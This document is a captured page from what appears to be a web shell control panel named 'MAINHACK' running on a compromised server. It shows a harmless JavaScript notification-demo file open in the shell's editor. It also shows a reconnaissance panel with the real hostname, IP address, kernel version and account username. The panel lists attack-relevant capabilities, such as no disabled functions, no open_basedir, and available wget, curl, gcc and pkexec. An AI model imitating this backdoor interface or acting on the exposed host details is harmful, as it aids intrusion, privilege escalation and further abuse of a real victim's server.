[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: ac-notification.js
'use strict'; document.addEventListener("DOMContentLoaded", function () { document.querySelector("#btn-default").addEventListener('click', function () { notifier.show('Hello!', 'I am a default notification.', '', '', 0); }); document.querySelector("#btn-info").addEventListener('click', function () { notifier.show('Reminder!', 'You have a meeting at 10:30 AM.', 'info', '', 0); }); document.querySelector("#btn-success").addEventListener('click', function () { notifier.show('Well Done!', 'You just submit your resume successfuly.', 'success', '', 0); }); document.querySelector("#btn-warning").addEventListener('click', function () { notifier.show('Warning!', 'The data presented here can be change.', 'warning', '', 0); }); document.querySelector("#btn-danger").addEventListener('click', function () { notifier.show('Sorry!', 'Could not complete your transaction.', 'danger', '', 0); }); document.querySelector("#btn-default-i").addEventListener('click', function () { notifier.show('Default!', 'I am a default notification.', '', '../assets/images/notification/clock-48.png', 0); }); document.querySelector("#btn-info-i").addEventListener('click', function () { notifier.show('Reminder!', 'You have a meeting at 10:30 AM.', 'info', '../assets/images/notification/survey-48.png', 0); }); document.querySelector("#btn-success-i").addEventListener('click', function () { notifier.show('Well Done!', 'You just submit your resume successfuly.', 'success', '../assets/images/notification/ok-48.png', 0); }); document.querySelector("#btn-warning-i").addEventListener('click', function () { notifier.show('Warning!', 'The data presented here can be change.', 'warning', '../assets/images/notification/medium_priority-48.png', 0); }); document.querySelector("#btn-danger-i").addEventListener('click', function () { notifier.show('Sorry!', 'Could not complete your transaction.', 'danger', '../assets/images/notification/high_priority-48.png', 0); }); document.querySelector("#btn-default-ac").addEventListener('click', function () { notifier.show('Default!', 'I am a default notification.', '', '../assets/images/notification/clock-48.png', 4000); }); document.querySelector("#btn-info-ac").addEventListener('click', function () { notifier.show('Reminder!', 'You have a meeting at 10:30 AM.', 'info', '../assets/images/notification/survey-48.png', 4000); }); document.querySelector("#btn-success-ac").addEventListener('click', function () { notifier.show('Well Done!', 'You just submit your resume successfuly.', 'success', '../assets/images/notification/ok-48.png', 4000); }); document.querySelector("#btn-warning-ac").addEventListener('click', function () { notifier.show('Warning!', 'The data presented here can be change.', 'warning', '../assets/images/notification/medium_priority-48.png', 4000); }); document.querySelector("#btn-danger-ac").addEventListener('click', function () { notifier.show('Sorry!', 'Could not complete your transaction.', 'danger', '../assets/images/notification/high_priority-48.png', 4000); }); var notificationId; var showNotification = function () { notificationId = notifier.show('Reminder!', 'You have a meeting at 10:30 AM.', 'info', '../assets/images/notification/survey-48.png', 4000); }; var hideNotification = function () { notifier.hide(notificationId); }; document.querySelector('#btn-nt-show').addEventListener('click', showNotification); document.querySelector('#btn-nt-hide').addEventListener('click', hideNotification); });
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.8 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002